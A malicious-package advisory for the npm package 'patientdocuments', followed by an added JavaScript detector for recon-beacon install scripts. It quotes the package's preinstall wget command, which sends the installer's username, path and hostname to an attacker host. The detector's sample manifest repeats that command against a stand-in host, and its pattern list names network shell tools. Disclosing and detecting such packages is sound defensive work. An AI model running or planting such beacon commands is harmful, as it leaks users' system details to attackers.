MAL-2026-5752

Malicious code in patientdocuments (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (56c5ab4dc6470deaebe29f4851edb91bc5d5704e9f9578a91e238490708c007b)

package.json declares a preinstall lifecycle script that runs `wget --quiet "http://orwa-orwa.dev-node-lap.workers.dev/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"`, firing automatically on `npm install`. The script leaks the installer's OS username, current working directory, and hostname to an attacker-controlled Cloudflare Workers endpoint over plain HTTP. The same beacon is duplicated in the `test` and `preupdate` scripts. The package ships no library code (no main module shipped), so its sole effect is the recon beacon. `unsafe-perm` is set, ensuring execution as root in privileged install contexts. This is a dependency-confusion / recon-beacon pattern: identity exfiltration with no legitimate purpose tied to the package's advertised function.
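A manifest check for the pattern described above, as an added example that is not part of the advisory or of Amazon Inspector: it flags `scripts` entries that combine a network tool with shell command substitution, and rates them higher when the hook runs automatically on install. The function name, the hook and tool lists, the sample manifests and the `beacon.example.invalid` host are assumptions constructed for illustration.

```javascript
// Added example: audit a parsed package.json for the recon-beacon script pattern.
// Hooks npm runs automatically during `npm install` (assumed list for this check).
const AUTO_RUN = new Set(["preinstall", "install", "postinstall", "prepare"]);
const NET_TOOL = /\b(wget|curl|nc|ncat)\b/;   // network client invoked from a script
const SHELL_SUBST = /\$\([^)]*\)|`[^`]*`/;    // $(whoami) or `whoami` style substitution
const PLAIN_HTTP = /\bhttp:\/\//i;            // unencrypted endpoint

function auditLifecycleScripts(manifest) {
  const findings = [];
  for (const [name, cmd] of Object.entries(manifest.scripts || {})) {
    if (typeof cmd !== "string") continue;
    const reasons = [];
    if (NET_TOOL.test(cmd)) reasons.push("network-tool");
    if (SHELL_SUBST.test(cmd)) reasons.push("shell-substitution");
    if (PLAIN_HTTP.test(cmd)) reasons.push("plain-http");
    // Beacon pattern: host values are interpolated into an outbound request.
    const beacon = reasons.includes("network-tool") &&
                   reasons.includes("shell-substitution");
    if (beacon) findings.push({ script: name, autoRun: AUTO_RUN.has(name), reasons });
  }
  // No declared entry point is only a hint: npm falls back to index.js if present.
  const noEntryPoint = !manifest.main && !manifest.exports && !manifest.bin;
  const severity = findings.some((f) => f.autoRun) ? "high"
                 : findings.length ? "review" : "none";
  return { severity, noEntryPoint, findings };
}

// Constructed sample manifests (not the real package contents).
const SUSPECT = {
  name: "example-internal-lib",
  version: "9.9.9",
  scripts: {
    preinstall: 'wget --quiet "http://beacon.example.invalid/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"',
    test: 'wget --quiet "http://beacon.example.invalid/?user=$(whoami)"',
  },
};
const BENIGN = {
  name: "example-ok",
  version: "1.0.0",
  main: "index.js",
  scripts: { test: "node test.js", postinstall: "node scripts/build.js" },
};

console.log(JSON.stringify(auditLifecycleScripts(SUSPECT), null, 2));
console.log(JSON.stringify(auditLifecycleScripts(BENIGN), null, 2));
```

Running such a check on a downloaded tarball's manifest before installation, or installing with `npm install --ignore-scripts`, keeps the hook from executing while the package is reviewed.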

Affected packages

npm / patientdocuments

No fixed version published yet for patientdocuments (npm). Pin to a known-safe version or switch to an alternative.

References